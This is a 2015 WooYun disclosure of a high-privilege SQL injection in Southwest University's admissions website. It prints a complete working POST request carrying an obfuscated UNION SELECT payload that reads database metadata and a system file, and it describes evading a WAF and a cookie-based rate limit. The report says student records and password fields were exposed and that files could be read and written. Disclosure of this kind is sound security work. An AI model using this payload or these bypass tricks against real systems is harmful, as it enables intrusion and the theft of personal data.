当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128530

漏洞标题:西南大学某系统存在高权限SQL注入漏洞

相关厂商:西南大学

漏洞作者: 路人甲

提交时间:2015-07-23 12:02

修复时间:2015-07-28 12:04

公开时间:2015-07-28 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

西南大学某系统存在高权限SQL注入漏洞,已确定可读可写档案

详细说明:

西南大学本科招生网存在高权限SQL Union Select注入漏洞,影响大量学生数据及少数成绩及榜单
尝试读取当前用户、mysql版本、当前数据库、数据路径
可发现当前数据库用户是高权限root账号

POST /zsjh/index.php HTTP/1.1
Host: bkzsw.swu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b627555b8dd7b4976e5459dc401d8bea; AJSTAT_ok_pages=3; AJSTAT_ok_times=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
nf=2011&ss=%E5%8C%97%E4%BA%AC&kl=%E6%90%86%E5%B7%A5'%09union%09select%09/*!30788user(),@@version,database(),@@datadir,LOAD_FILE('C:\boot.ini'),6,7*/%23

current_user.png


有趣的是,除了有安全狗之外,cookie中有一数值会纪录网页存取次数,太多次会拒绝联机。直接将他改为负数

cookie.png


数据库存有大量学生数据

dump1.png


dump2.png


dump3.png


可以捞取数据库用户字段

password.png


可以读档

read.png


可以写档

write.png


漏洞证明:

dump1.png


dump2.png


dump3.png

修复方案:

白名单过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-28 12:04

厂商回复:

最新状态:

暂无